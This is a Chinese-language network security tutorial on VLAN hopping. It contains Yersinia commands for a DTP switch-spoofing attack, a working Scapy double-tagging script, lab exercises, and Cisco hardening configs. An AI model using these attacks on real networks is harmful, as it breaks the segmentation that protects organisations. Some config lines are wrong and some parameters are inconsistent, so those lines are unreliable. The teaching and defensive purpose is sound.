Day-009-VLAN 安全与 VLAN-Hopping

# Day 08: VLAN 安全与 VLAN Hopping

> 网络安全系列第 8 天 | 预计阅读时间：35 分钟 | 难度：★★★★☆

---

## 清单 目录

1. [VLAN 基础概念](#vlan 基础概念)
2. [802.1Q 协议详解](#8021q 协议详解)
3. [VLAN 安全威胁](#vlan 安全威胁)
4. [VLAN Hopping 攻击](#vlan-hopping 攻击)
5. [私有 VLAN 安全](#私有 vlan 安全)
6. [实验环境搭建](#实验环境搭建)
7. [实战演练](#实战演练)
8. [防护策略与最佳实践](#防护策略与最佳实践)
9. [总结与思考](#总结与思考)
10. [参考资料](#参考资料)

---

## VLAN 基础概念

### 什么是 VLAN

VLAN（Virtual Local Area Network，虚拟局域网）是一种将物理网络划分为多个逻辑网络的技术，让网络管理员可以在同一套物理设备上创建多个独立的广播域。

**形象理解**：
如果把物理网络比作一栋大楼，那么：
- **物理网络** = 大楼本身（所有房间都在同一建筑内）
- **VLAN** = 楼层或部门（每个 VLAN 像一个独立楼层）
- **交换机** = 电梯和走廊（控制谁能到哪个楼层）

**VLAN 的价值**：
```
1. 广播隔离
   - 减少广播域大小
   - 降低网络拥塞
   - 提高性能

2. 安全隔离
   - 部门间隔离
   - 访客网络隔离
   - 敏感系统隔离

3. 灵活管理
   - 逻辑分组
   - 不受物理位置限制
   - 易于调整
```

### VLAN 应用场景

**典型企业 VLAN 设计**：
```
VLAN 10: 管理层
- IP: 192.168.10.0/24
- 用户：高管、财务
- 安全级别：高

VLAN 20: 研发部
- IP: 192.168.20.0/24
- 用户：工程师、开发
- 安全级别：中

VLAN 30: 普通员工
- IP: 192.168.30.0/24
- 用户：销售、行政
- 安全级别：中

VLAN 40: 访客网络
- IP: 192.168.40.0/24
- 用户：访客、承包商
- 安全级别：低（仅互联网访问）

VLAN 50: IoT 设备
- IP: 192.168.50.0/24
- 设备：打印机、摄像头
- 安全级别：低（隔离）

VLAN 99: 管理网络
- IP: 192.168.99.0/24
- 设备：交换机、路由器
- 安全级别：最高
```

---

## 802.1Q 协议详解

### VLAN 标签格式

```
802.1Q 标签（4 字节）：

┌─────────────────────────────────────────┐
│ TPID (16bit) │ TCI (16bit)             │
│ 0x8100       │                         │
├─────────────────────────────────────────┤
│              │ PCP │ DEI │ VID (12bit) │
│              │(3bit)│(1bit)│           │
└─────────────────────────────────────────┘

字段说明：
- TPID（Tag Protocol Identifier）: 0x8100
  标识这是 802.1Q 标签

- PCP（Priority Code Point）: 3 位
  优先级（0-7），用于 QoS

- DEI（Drop Eligible Indicator）: 1 位
  是否可丢弃（拥塞时）

- VID（VLAN Identifier）: 12 位
  VLAN ID（1-4094）
  0 和 4095 保留
```

### 端口类型

**Access 端口**：
```
特点：
- 属于单个 VLAN
- 不带标签转发
- 连接终端设备

工作流程：
接收：去掉 VLAN 标签 → 转发给设备
发送：接收无标签帧 → 添加 VLAN 标签 → 转发

配置示例（Cisco）：
interface GigabitEthernet0/1
 switchport mode access
 switchport access vlan 10
 description PC-VLAN10
```

**Trunk 端口**：
```
特点：
- 承载多个 VLAN
- 带 802.1Q 标签
- 连接交换机/路由器

工作流程：
接收：根据 VLAN 标签转发
发送：保持 VLAN 标签 → 转发

配置示例（Cisco）：
interface GigabitEthernet0/24
 switchport mode trunk
 switchport trunk native vlan 99
 switchport trunk allowed vlan 10,20,30,99
 description Trunk-to-Core
```

**Native VLAN**：
```
定义：
Trunk 端口上不带标签的 VLAN

默认：
VLAN 1（不安全，应更改）

安全风险：
- VLAN Hopping 攻击向量
- 未打标签的流量
- 可能被利用

最佳实践：
- 更改 Native VLAN（非 VLAN 1）
- Native VLAN 专用（不承载用户流量）
- 两端配置一致
```

---

## VLAN 安全威胁

### 威胁分类

```
VLAN 安全威胁全景：

1. VLAN Hopping
   - Switch Spoofing
   - Double Tagging
   - 风险等级：高

2. MAC 地址攻击
   - MAC 泛洪
   - MAC 欺骗
   - 风险等级：中

3. 私有 VLAN 逃逸
   - PVLAN 配置错误
   - 风险等级：中

4. 管理 VLAN 攻击
   - 默认 VLAN 1
   - 管理接口暴露
   - 风险等级：高

5. DTP 攻击
   - 动态 Trunk 协商
   - 风险等级：高
```

### Native VLAN 风险

**攻击场景**：
```
场景 1: Native VLAN 不匹配

交换机 A: Native VLAN 1
交换机 B: Native VLAN 99

攻击者连接到交换机 A 的 Trunk 端口，
发送不带标签的帧，
交换机 A 认为这是 VLAN 1 的流量，
但交换机 B 认为这是 VLAN 99 的流量，
导致 VLAN 跳跃。

场景 2: Native VLAN 承载用户流量

Native VLAN 配置为 VLAN 1，
VLAN 1 承载用户流量，
攻击者通过 Trunk 端口，
访问 Native VLAN 流量，
绕过 VLAN 隔离。
```

---

## VLAN Hopping 攻击

### 攻击类型 1: Switch Spoofing

**原理详解**：
```
Switch Spoofing（交换机欺骗）利用 DTP（Dynamic Trunking Protocol）协议，
让攻击者的设备伪装成交换机，与目标交换机建立 Trunk 连接，
从而访问所有 VLAN。

攻击流程：

1. 攻击者连接交换机
   ┌──────────┐
   │ 攻击者   │
   │ 笔记本   │
   └────┬─────┘
        │
        ▼
   ┌──────────┐
   │ 交换机   │
   │ 端口配置 │
   │ dynamic  │
   │ auto     │
   └──────────┘

2. 攻击者发送 DTP 包
   "我是交换机，我们建立 Trunk 吧"

3. 交换机同意建立 Trunk
   端口模式变为 Trunk

4. 攻击者访问所有 VLAN
   发送带不同 VLAN 标签的帧
   访问所有 VLAN 的资源

攻击条件：
✓ 交换机端口配置为 dynamic auto/desirable
✓ DTP 协议启用
✓ 攻击者能发送 DTP 包
```

**攻击演示（Yersinia）**：
```bash
# 安装 Yersinia
apt install yersinia

# 启动图形界面
yersinia -G

# 操作步骤：
# 1. 选择 DTP 协议
# 2. 点击"Launch Attack"
# 3. 选择"Enable Trunk"
# 4. 观察端口变为 Trunk 模式

# 命令行模式
yersinia -d 0 -attack dtp,enable_trunk

# 验证攻击成功
# 在交换机上查看：
show interface status
# 端口模式应变为"trunk"
```

### 攻击类型 2: Double Tagging

**原理详解**：
```
Double Tagging（双标签）攻击利用 802.1Q 标签的嵌套，
绕过 VLAN 隔离，单向访问其他 VLAN。

攻击流程：

攻击者（VLAN 10）发送双标签帧：
┌──────────┬──────────┬──────────┐
│ 外层标签 │ 内层标签 │   数据   │
│ VLAN 1   │ VLAN 20  │  攻击包  │
│(Native)  │ (目标)   │          │
└──────────┴──────────┴──────────┘

第一台交换机（攻击者连接）：
1. 收到双标签帧
2. 剥离外层标签（VLAN 1）
3. 通过 Trunk 转发（内层标签仍在）

第二台交换机（目标 VLAN）：
1. 收到单标签帧（VLAN 20）
2. 转发到 VLAN 20
3. 到达目标主机

攻击特点：
✓ 单向攻击（只能出去，不能回来）
✓ 无需 Trunk 协商
✓ 难以检测
✓ 需要特定配置（Native VLAN）

攻击条件：
✓ 攻击者与 Trunk 端口 Native VLAN 相同
✓ 目标 VLAN 与攻击者 VLAN 不同
✓ 交换机不检查标签嵌套
```

**攻击演示（Scapy）**：
```python
#!/usr/bin/env python3
# double_tagging_attack.py
# VLAN Double Tagging 攻击演示

from scapy.all import *

# 配置
ATTACKER_VLAN = 10    # 攻击者 VLAN
NATIVE_VLAN = 1       # Native VLAN
TARGET_VLAN = 20      # 目标 VLAN
TARGET_IP = "192.168.20.100"

# 构造双标签帧
eth = Ether(src="AA:BB:CC:DD:EE:FF", dst="FF:FF:FF:FF:FF:FF")

# 外层标签（Native VLAN）
dot1q_outer = Dot1Q(vlan=NATIVE_VLAN)

# 内层标签（目标 VLAN）
dot1q_inner = Dot1Q(vlan=TARGET_VLAN)

# IP 层
ip = IP(src="192.168.10.100", dst=TARGET_IP)

# TCP 层
tcp = TCP(dport=80, flags="S")

# 完整数据包
packet = eth/dot1q_outer/dot1q_inner/ip/tcp

# 发送
sendp(packet, iface="eth0")

print(f"[*] 已发送双标签攻击包")
print(f"    外层 VLAN: {NATIVE_VLAN} (Native)")
print(f"    内层 VLAN: {TARGET_VLAN} (目标)")
print(f"    目标 IP: {TARGET_IP}")
```

---

## 私有 VLAN 安全

### 私有 VLAN 概念

**什么是私有 VLAN**：
```
私有 VLAN（Private VLAN，PVLAN）是一种进一步隔离 VLAN 内通信的技术。

传统 VLAN：
同一 VLAN 内的所有设备可以自由通信。

私有 VLAN：
同一 VLAN 内的设备被进一步隔离，
只能与特定设备通信。

应用场景：
✓ 酒店网络（客人间隔离）
✓ 云主机（租户间隔离）
✓ 多租户环境
✓ 安全要求高的场景
```

**PVLAN 类型**：
```
主 VLAN（Primary VLAN）：
- 下行流量
- 与所有辅助 VLAN 通信

辅助 VLAN 类型：

1. 隔离 VLAN（Isolated VLAN）
   - 完全隔离
   - 只能与主 VLAN 通信
   - 不能与其他任何端口通信
   - 应用：酒店客人、云主机

2. 团体 VLAN（Community VLAN）
   - 组内可通信
   - 不能与其他组通信
   - 能与主 VLAN 通信
   - 应用：部门内部、项目组
```

**PVLAN 端口类型**：
```
1. Promiscuous（混杂端口）
   - 可与所有端口通信
   - 通常连接路由器、防火墙
   - 每个 PVLAN 至少一个

2. Isolated（隔离端口）
   - 只能与 Promiscuous 端口通信
   - 不能与其他任何端口通信
   - 应用：客人、租户

3. Community（团体端口）
   - 可与同组端口通信
   - 可与 Promiscuous 端口通信
   - 不能与其他组通信
   - 应用：部门、项目组
```

---

## 实验环境搭建

### GNS3/EVE-NG 拓扑

```
┌─────────────────────────────────────────┐
│            VLAN 安全实验室               │
│                                         │
│  ┌─────────────┐    ┌─────────────┐    │
│  │  攻击机     │    │  受害者     │    │
│  │  (Kali)     │    │  (Ubuntu)   │    │
│  │  VLAN 10    │    │  VLAN 20    │    │
│  └──────┬──────┘    └──────┬──────┘    │
│         │                  │            │
│         └────────┬─────────┘            │
│                  │                       │
│           ┌──────▼──────┐               │
│           │   交换机     │               │
│           │ (可管理)    │               │
│           └─────────────┘               │
└─────────────────────────────────────────┘
```

### Cisco 交换机配置

```bash
# VLAN 基础配置
vlan 10
 name Sales
vlan 20
 name Engineering
vlan 99
 name Native

# Access 端口配置
interface GigabitEthernet1/0/1
 description Sales-PC
 switchport mode access
 switchport access vlan 10
 spanning-tree portfast

interface GigabitEthernet1/0/2
 description Engineering-PC
 switchport mode access
 switchport access vlan 20
 spanning-tree portfast

# Trunk 端口配置
interface GigabitEthernet1/0/48
 description Trunk-to-Core
 switchport mode trunk
 switchport trunk native vlan 99
 switchport trunk allowed vlan 10,20,99
```

---

## 实战演练

### 实验 1: DTP 攻击测试

**目标**：测试 DTP 攻击

**步骤**：
```bash
# 1. 检查交换机 DTP 状态
show dtp interface GigabitEthernet1/0/1
# 应显示当前 DTP 模式

# 2. 启动 Yersinia
yersinia -G

# 3. 选择 DTP → Launch Attack → Enable Trunk

# 4. 验证攻击
show interface GigabitEthernet1/0/1 switchport
# 端口模式应变为"trunk"

# 5. 尝试访问其他 VLAN
# 发送带 VLAN 20 标签的帧
# 观察是否能到达 VLAN 20
```

### 实验 2: Double Tagging 攻击

**目标**：测试双标签攻击

**步骤**：
```bash
# 1. 配置 Native VLAN
# 确保攻击者 VLAN = Native VLAN

# 2. 运行攻击脚本
python3 double_tagging_attack.py

# 3. 在目标 VLAN 抓包
tcpdump -i eth0 -n host 192.168.20.100

# 4. 验证攻击
# 目标应收到 SYN 包
# 但响应无法返回（单向攻击）

# 5. 分析结果
# 为什么是单向的？
# 如何防御？
```

### 实验 3: 防护配置验证

**目标**：验证防护配置

**步骤**：
```bash
# 1. 配置防护（见下文防护策略）

# 2. 尝试 DTP 攻击
# 应该失败

# 3. 尝试 Double Tagging
# 应该被阻止

# 4. 验证配置
show running-config
show interface switchport

# 5. 记录结果
```

---

## 防护策略与最佳实践

### DTP 攻击防护

**配置示例**：
```bash
# 1. 禁用 DTP（推荐）
interface range GigabitEthernet1/0/1-47
 switchport nonegotiate
# 不协商，手动配置模式

# 2. 手动配置 Access 模式
interface GigabitEthernet1/0/1
 switchport mode access
 switchport access vlan 10
# 明确指定模式，不依赖协商

# 3. 手动配置 Trunk 模式
interface GigabitEthernet1/0/48
 switchport mode trunk
 switchport trunk native vlan 99
 switchport trunk allowed vlan 10,20,99
# 明确指定 Trunk 参数

# 4. 禁用未用端口
interface range GigabitEthernet1/0/25-47
 shutdown
 switchport mode access
 switchport access vlan 99
# 关闭不用的端口，减少攻击面
```

### Double Taging 防护

**配置示例**：
```bash
# 1. 更改 Native VLAN
vlan 99
 name Native-Unused
# 使用专用 VLAN，不承载用户流量

interface GigabitEthernet1/0/48
 switchport trunk native vlan 99
# Trunk 端口使用专用 Native VLAN

# 2. Native VLAN 不打标签
vlan dot1q tag native
# 强制 Native VLAN 也打标签（部分交换机支持）

# 3. VLAN 修剪
interface GigabitEthernet1/0/48
 switchport trunk allowed vlan 10,20
# 只允许必要的 VLAN

# 4. 私有 VLAN
# 进一步隔离用户
```

### 完整安全配置模板

```bash
! Cisco 交换机安全配置模板

! 1. 创建 VLAN
vlan 10
 name Sales
vlan 20
 name Engineering
vlan 99
 name Native-Unused
vlan 999
 name Blackhole

! 2. 配置 Access 端口
interface range GigabitEthernet1/0/1-24
 description User-Access
 switchport mode access
 switchport access vlan 10
 switchport nonegotiate
 switchport port-security
 switchport port-security maximum 2
 switchport port-security violation restrict
 spanning-tree portfast
 spanning-tree bpduguard enable

! 3. 配置 Trunk 端口
interface GigabitEthernet1/0/48
 description Trunk-Uplink
 switchport mode trunk
 switchport trunk native vlan 99
 switchport trunk allowed vlan 10,20,99
 switchport nonegotiate

! 4. 禁用未用端口
interface range GigabitEthernet1/0/25-47
 description Unused
 shutdown
 switchport mode access
 switchport access vlan 999

! 5. 管理 VLAN
interface Vlan99
 description Management
 ip address 192.168.99.1 255.255.255.0
 ip access-gateway 192.168.99.254

! 6. 保存配置
write memory
```

---

## 总结与思考

### 核心要点回顾

1. **VLAN Hopping**
   - Switch Spoofing（利用 DTP）
   - Double Tagging（利用 Native VLAN）
   - 两种攻击原理不同

2. **关键防护**
   - 禁用 DTP
   - 更改 Native VLAN
   - 手动配置端口模式

3. **最佳实践**
   - 最小权限
   - 定期审计
   - 监控配置变更

### 深入思考问题

1. **SDN 对 VLAN 安全的影响**？
   - 集中控制
   - 动态 VLAN
   - 新攻击面？

2. **VXLAN 等 overlay 技术安全性**？
   - 封装安全
   - VNI 隔离
   - 与传统 VLAN 对比？

3. **零信任架构下 VLAN 的角色**？
   - 微隔离替代？
   - 互补关系？
   - 未来演进？

### 实战建议

**中小企业**：
1. 禁用 DTP
2. 更改 Native VLAN
3. 配置端口安全
4. 定期审计配置

**大型企业**：
1. 全面禁用 DTP
2. 实施私有 VLAN
3. 配置监控告警
4. 自动化合规检查

**云环境**：
1. 使用云原生网络隔离
2. 安全组配置
3. 网络 ACL
4. 微隔离实施

---

## 参考资料

### 标准文档
- IEEE 802.1Q (VLAN 标准)
- Cisco VLAN 配置指南

### 工具资源
- [Yersinia](https://www.yersinia.net/)
- [Scapy](https://scapy.net/)

### 在线资源
- [Cisco VLAN Security](https://www.cisco.com/)
- [VLAN Hopping 攻击详解](https://www.sans.org/)

### 书籍推荐
- 《交换机安全配置指南》
- 《VLAN 设计与实施》
- 《网络攻击与防御实战》

---

**标记 明日预告**：Day 09 - 无线网络基础与安全（802.11）

> 本文内容仅供学习和研究使用，请勿用于非法目的。所有实验请在隔离环境中进行。

---

*本文是 365 天信息安全技术系列的第 8 篇，精编版本*